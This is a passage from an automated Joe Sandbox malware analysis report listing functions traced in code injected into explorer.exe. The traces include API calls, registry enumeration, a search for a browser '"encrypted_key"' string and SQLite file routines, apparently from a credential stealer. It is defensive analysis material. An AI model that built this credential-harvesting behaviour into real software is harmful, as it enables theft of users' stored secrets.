Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

Part of subcall function 00C3418A: wsprintfW.USER32 ref: 00C34212

Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C343B9

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: 23c7e465ae7a92d7dc64de8f80a8b3a13caf833171fd4f19ab9475d3612c9e3c
Instruction ID: 4201fc135146588791dfb1ff22faa86116acb37ffaf9ab1aa1b42a55ea224897
Opcode Fuzzy Hash: 23c7e465ae7a92d7dc64de8f80a8b3a13caf833171fd4f19ab9475d3612c9e3c
Instruction Fuzzy Hash: 3D1142B1114201BFE719AB10CC45EBF77EDEB88344F00452DF889D2150EB74AE489B66

Function 00C3B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C3B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 00C3B96F

Strings

winOpen, xrefs: 00C3BA22
psow, xrefs: 00C3BA95

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: 35d33bc459617ded6080ae5777a2410bc01df7470760e988bc5b37d789f23dd7
Instruction ID: c391cd69ed51b4a5f4a9ace8994de1b278397f6a8ed1eca83e594fe8b9076ad9
Opcode Fuzzy Hash: 35d33bc459617ded6080ae5777a2410bc01df7470760e988bc5b37d789f23dd7
Instruction Fuzzy Hash: 3371A371A24702AFC710DF25C88175AB7E0FF88324F144A2DFA6497281D774DE14EB92

Function 00C99247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C97000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C97000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c97000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ec39b98aacfc8256404db966de7e7b960e07ebeaebc70c610e59104207a7ecd
Instruction ID: 2dc41ca7e47a53bbdc9ed659214b8f7dfd47ad045b2918da17ca62424422f815
Opcode Fuzzy Hash: 7ec39b98aacfc8256404db966de7e7b960e07ebeaebc70c610e59104207a7ecd
Instruction Fuzzy Hash: 5EA14B729547525BDF228E7CCCC86A1BBA0EB52324B2D076CC5E18B2D2E7709907C7A1

Function 00C319E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98

Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: e2175ef1f018b5860b6bf2b0c5b85a847c0d63b865958797718678bdcee655a6
Instruction ID: e4c37d887e711482306d5d133f0c89560aff50224ad988ab08e278dbefb0f90d
Opcode Fuzzy Hash: e2175ef1f018b5860b6bf2b0c5b85a847c0d63b865958797718678bdcee655a6
Instruction Fuzzy Hash: 6321E572216345AFE7248B21CD04F7FB7E8EBC8755F080A2DFD9692140E720CE40A721

Function 00C31EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 00C31ED5

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C31F0C
RegCloseKey.ADVAPI32(?), ref: 00C31F98

Part of subcall function 00C31953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00C32F0C), ref: 00C31973
Part of subcall function 00C31953: lstrlenW.KERNEL32(00C86564,?,?,00C32F0C), ref: 00C31978
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,?,?,?,00C32F0C), ref: 00C31990
Part of subcall function 00C31953: lstrcatW.KERNEL32(00000000,00C86564,?,?,00C32F0C), ref: 00C31994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C31F82

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: 6b939bd455c50636a34c5dc24951c8cb0efe3d1c6e7d55eba13cf135bf514da5
Instruction ID: a10dab88fdc73c81de99faab5666331bc2e1e3a5669ff0b59746e481ad1ce224
Opcode Fuzzy Hash: 6b939bd455c50636a34c5dc24951c8cb0efe3d1c6e7d55eba13cf135bf514da5
Instruction Fuzzy Hash: 93218C71218301AFD705AB61CC48E2FBBEDEF88354F04892DF89A92110DB35CD05AB66

Function 00C31C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00C33E1E,00000000,?,00C33FA8), ref: 00C31C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00C33FA8), ref: 00C31C56
CloseHandle.KERNELBASE(00000000,?,00C33FA8), ref: 00C31C91

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00C33FA8), ref: 00C31C76

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 7d3760651b7cb9c9092d1bfde047fdfd7e50afa7f0c0f8d75f98fa2540003ed0
Instruction ID: a4c1434a31d9a46f432fb88a163269bca59f9d61fe5dafb68e5c764c61b5c4cf
Opcode Fuzzy Hash: 7d3760651b7cb9c9092d1bfde047fdfd7e50afa7f0c0f8d75f98fa2540003ed0
Instruction Fuzzy Hash: EBF028312102187FC2241B25EC88F7F7A5CDB427F9F190318FC16D21D0DB126C015678

Function 00C32FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,00C33E30,00000000,00000000,?,00C33FA8), ref: 00C32FC1
lstrlen.KERNEL32("encrypted_key":",?,00C33FA8), ref: 00C32FCE
StrStrIA.SHLWAPI("encrypted_key":",00C8692C,?,00C33FA8), ref: 00C32FDD

Part of subcall function 00C3190B: lstrlen.KERNEL32(?,?,?,?,00000000,00C32783), ref: 00C3192B
Part of subcall function 00C3190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00C32783), ref: 00C31930
Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,?), ref: 00C31946
Part of subcall function 00C3190B: lstrcat.KERNEL32(00000000,00000000), ref: 00C3194A

Strings

"encrypted_key":", xrefs: 00C32FBA, 00C32FBF, 00C32FCD, 00C32FDC

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID: "encrypted_key":"
API String ID: 493641738-877455259
Opcode ID: 7609b8c0d053ab1cabaff407476732b7e3c5ca70356f8c21104654de51832286
Instruction ID: 7bd78b06d301c94e3e79f7e08cb1228d3370c4ff9c70d69efe7c6bd4c1ed408f
Opcode Fuzzy Hash: 7609b8c0d053ab1cabaff407476732b7e3c5ca70356f8c21104654de51832286
Instruction Fuzzy Hash: DDE0923261AB747F87756BF51C98B8F7F689F0A6157090078F61197223DE928901D3A8

Function 00C3BAFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,?,readonly_shm,00000000,00000000,?,?,?), ref: 00C3BB40

Strings

winDelete, xrefs: 00C3BB6A

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID: winDelete
API String ID: 3188754299-3936022152
Opcode ID: c785c943caa2bb186f678c065ff0ea623d757bc9c526b14c203087bfb602c4ff
Instruction ID: 6a75aefb14fd55c7747a22df6c7bc23d0b63c7e3be82f5b67e02768a12001b0f
Opcode Fuzzy Hash: c785c943caa2bb186f678c065ff0ea623d757bc9c526b14c203087bfb602c4ff
Instruction Fuzzy Hash: BF11C431A20208EBD710AB69C846A7DF775DF91764F104125FA26D7288DF308E01A752

Function 00C32EA5 Relevance: 4.5, APIs: 3, Instructions: 43registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 00C32EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00C32F54
RegCloseKey.KERNELBASE(?), ref: 00C32F62

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocateCloseEnumFreeOpen
String ID:
API String ID: 1066184869-0
Opcode ID: dc35e9be6fdaf38c1d992908586172779a804df45974dd8737f2be413092d49b
Instruction ID: fa6313d4af09420916dbb8f22cfe46f4d44c67945c29ebf6511e8e4c878c2b0e
Opcode Fuzzy Hash: dc35e9be6fdaf38c1d992908586172779a804df45974dd8737f2be413092d49b
Instruction Fuzzy Hash: F301D635214250AFCB199F21DC05EAF7FA9EFC8350F04442DF85A82150CB358945FBE6

Function 00C34B72 Relevance: 4.5, APIs: 3, Instructions: 8COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C34B74
CoUninitialize.COMBASE ref: 00C34B83
ExitProcess.KERNEL32 ref: 00C34B8B

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: ExitInitializeProcessUninitialize
String ID:
API String ID: 4175140541-0
Opcode ID: 53142dbcb0cd28474f3c657ecfd29d76d0aec730ea85e76055c7014b0857564b
Instruction ID: 4a1efe2cf94a8d85e031cd9746461b0ac3765bffea370d95d3998f1b02bbc29f
Opcode Fuzzy Hash: 53142dbcb0cd28474f3c657ecfd29d76d0aec730ea85e76055c7014b0857564b
Instruction Fuzzy Hash: 6CC092303A42108BEA843BF0AC0E70D3A24EF00B27F004040F20AC91A2DBA0A4009B3A

Function 00C39FC8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00C39FF8

Strings

failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 00C3A00E

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CreateHeap
String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
API String ID: 10892065-982776804
Opcode ID: 54d483f73e8c9feb0c862aa4ede415ecef726e828471d8d49fc748ec5e369dee
Instruction ID: ada65687f9995028ea494e66ae3de7ca46d698e692ab55414887f01a3e45ed12
Opcode Fuzzy Hash: 54d483f73e8c9feb0c862aa4ede415ecef726e828471d8d49fc748ec5e369dee
Instruction Fuzzy Hash: 9AF02B72628741BFE7301A94DC89F2B779CD798785F24042AFD97D2140E6B0AC008331

Function 00C31AFE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00C31000: GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
Part of subcall function 00C31000: RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,00C32E83,PathToExe,00000000,00000000), ref: 00C31B16

Part of subcall function 00C31011: GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
Part of subcall function 00C31011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027

Part of subcall function 00C319E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A1E
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A3C
Part of subcall function 00C319E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00C31A75
Part of subcall function 00C319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31A98

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00C31B40

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2162223993-2036018995
Opcode ID: f9ad762ef0bf7841fba17096eccb39daa40d5f4100ba8ddfe68fe9216a9092e2
Instruction ID: 730b2b97fae82511fc96169c6d166fccdcfd72d60912bfa4e95d9170c0ab7c6e
Opcode Fuzzy Hash: f9ad762ef0bf7841fba17096eccb39daa40d5f4100ba8ddfe68fe9216a9092e2
Instruction Fuzzy Hash: C3F059777106485FC6116A2ACC88E7B764ECBC13AAB0F0029FC2983201EE236C419274

Function 00C3A33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00C3A35F

Strings

winSeekFile, xrefs: 00C3A381

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: FilePointer
String ID: winSeekFile
API String ID: 973152223-3168307952
Opcode ID: c87bf8b0f178e8dfa3e0b170f0b13c9b4b46365e3a4acbd7e7af3b103f1fa22e
Instruction ID: e5d9b47dbab98b8ceeb754712b8a5c9ef72cdead017aab2449e2fa73175951ab
Opcode Fuzzy Hash: c87bf8b0f178e8dfa3e0b170f0b13c9b4b46365e3a4acbd7e7af3b103f1fa22e
Instruction Fuzzy Hash: 2AF0B430624204AFD7119F64DC05BBB77EEEB45320F14836AFDB1C62E0EA30DD10AAA1

Function 00C39EA7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(05240000,00000000,?), ref: 00C39EB5

Strings

failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00C39ECD

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AllocateHeap
String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
API String ID: 1279760036-667713680
Opcode ID: 51894a8d036195b1432591e5264a86ed8966cfbc7f6c11e2f2a31565d8ae6bd2
Instruction ID: 3d3d227c4d6eb5e73b00b0c7338b97a6d8547ecd0dfb4e9848c8c333c91e418b
Opcode Fuzzy Hash: 51894a8d036195b1432591e5264a86ed8966cfbc7f6c11e2f2a31565d8ae6bd2
Instruction Fuzzy Hash: 83E0C2776082117FC2222B84AC0AF2FB768EB94F50F050116FE10A2270C674DC01A7A2

Function 00C39EE8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(05240000,00000000,?), ref: 00C39EF8

Strings

failed to HeapFree block %p (%lu), heap=%p, xrefs: 00C39F0E

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID: failed to HeapFree block %p (%lu), heap=%p
API String ID: 3298025750-4030396798
Opcode ID: cbe8948d5ade575d44e794d1641bd9d9b11266bb2653815a7852c45f3c3c2737
Instruction ID: e5be1bc1c602020e24381227df3f4a3a8854b1b5c32247c5a58f8663729f8857
Opcode Fuzzy Hash: cbe8948d5ade575d44e794d1641bd9d9b11266bb2653815a7852c45f3c3c2737
Instruction Fuzzy Hash: 37D0C2731082017BC3002B909C0AF2F773CAF98B00F080019F51091075D6B49850BBA1

Function 00C31B6A Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00C32893,00000000,00000000,00000000,?), ref: 00C31B82
CloseHandle.KERNELBASE(00000000), ref: 00C31B8F

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: 894e210951f5325efbfd58de71bc8f307bc267c9fb006795d41352f95c8f9402
Instruction ID: 86a328c84207c79957a2b4d2e3265afd4596a0aa7ff975ed3343ff7532805e1b
Opcode Fuzzy Hash: 894e210951f5325efbfd58de71bc8f307bc267c9fb006795d41352f95c8f9402
Instruction Fuzzy Hash: 67D012B126363067D57517357C0CFABAE1CDF026B9F080614B82DD90D0E2148D8786E8

Function 00C31011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C31162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00C3116F

GetProcessHeap.KERNEL32(00000000,00000000,?,00C31A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2), ref: 00C31020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00C31AE2,PortNumber,00000000,00000000), ref: 00C31027

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 6ffd08348fbfe35d91ba3753dd1834ca3d2e95c24503b77463d6b06cd43e2ea1
Instruction ID: 9c91a00bc1b6ed235454391914ebfbd595f0d8fd71b759cb896612c50d75dd97
Opcode Fuzzy Hash: 6ffd08348fbfe35d91ba3753dd1834ca3d2e95c24503b77463d6b06cd43e2ea1
Instruction Fuzzy Hash: E2C04C714152605AC96427A47D0DBCF7B19DF49362F090441BD1697153CA658C4187A4

Function 00C31000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00C311C7,?,?,00000001,00000000,?), ref: 00C31003
RtlAllocateHeap.NTDLL(00000000), ref: 00C3100A

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 070b225847e14b5cb6dba65b702496dedbea0c6da2edea013048e837f81312c7
Instruction ID: 5f586fcf24401a2e664e86e0c5a5bf1612b1ec4d3d599d4b0cfac004370f1ab0
Opcode Fuzzy Hash: 070b225847e14b5cb6dba65b702496dedbea0c6da2edea013048e837f81312c7
Instruction Fuzzy Hash: 4BA001B5950204ABEE446BA4AE4EB1F3A29FB84B02F104544B246860A3DAA458048B29

Function 00C312A3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlZeroMemory.NTDLL(?,00000018), ref: 00C312B5

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: MemoryZero
String ID:
API String ID: 816449071-0
Opcode ID: 5ea4874631024b1c55c0109fefb030f374af15a5c5789ac4ac38fe8b4c893512
Instruction ID: a8807299ace7721890d99eac6a2f95d0a7b5f9154b0e946809462fa0296ac06f
Opcode Fuzzy Hash: 5ea4874631024b1c55c0109fefb030f374af15a5c5789ac4ac38fe8b4c893512
Instruction Fuzzy Hash: 7311F5B1A01209AFDB10DFA9E988BAEB7BCEB08741F144029FD55E7241D731DE01CB64

Function 00C31B9D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000000,00000000,00C32C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00C31BAA

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 0d61f6251080ef1b3dd0c92892ae752e2debd5652aaae4a2ccada9e663878cc4
Instruction ID: a570849491aa9d55de6f41db26b2e513ac25754c058f14e890b649bbf33e8816
Opcode Fuzzy Hash: 0d61f6251080ef1b3dd0c92892ae752e2debd5652aaae4a2ccada9e663878cc4
Instruction Fuzzy Hash: 01D0A9B3E224308B8A6426383C04996E2846B007BC72E03B4FC36F30D0E224CE8243C4

Function 00C31677 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00C31684

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 2797e75e42461ab9fc25cc2c179ff480be364a474b1a9df1e85c11d7d4fa6530
Instruction ID: 818b4b96351cc84d790231be0c258dfc5df1386f16c20fea489cc14ec0ec18ff
Opcode Fuzzy Hash: 2797e75e42461ab9fc25cc2c179ff480be364a474b1a9df1e85c11d7d4fa6530
Instruction Fuzzy Hash: F0C08C30120231DFE7301B708C0AB8A36E4EF197B2F0A0969F4C19D0C0E2F408C0CB90

Function 00C3104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00C3158A), ref: 00C31056

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c426aad77155d419ef0b7c9a68e2d2c69b6ef82ff4a81e270d28752db4eec3c
Instruction ID: 3484289c4ae4840396b7c1aeded7c0cbc8720b269c3a4675f47464b80a59db17
Opcode Fuzzy Hash: 0c426aad77155d419ef0b7c9a68e2d2c69b6ef82ff4a81e270d28752db4eec3c
Instruction Fuzzy Hash: 28A002F07D53007AFD6957A2AE1FF196D389741F02F100244B30D7C0D056E57500862D

Function 00C3105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,00C34A5B,?,?,00000000,?,?,?,?,00C34B66,?), ref: 00C31065

Memory Dump Source

Source File: 0000000B.00000002.2428929470.0000000000C31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_c31000_explorer.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 1c346578963323db8e69ddeafccfc90c36256593c5fd11791821739cb825465f
Instruction ID: e5afa00b82dd6d285afb489d8e92dabd1c7a562081041a1e179eb970171dacd7
Opcode Fuzzy Hash: 1c346578963323db8e69ddeafccfc90c36256593c5fd11791821739cb825465f
Instruction Fuzzy Hash: F3A0027069070066EDB457205D0EF0E26156740B01F2045447242AD0D249A5E0448B1C

Non-executed Functions

Function 00C3349B Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 201nativefilestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00C334C0

Part of subcall function 00C333C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00C33401

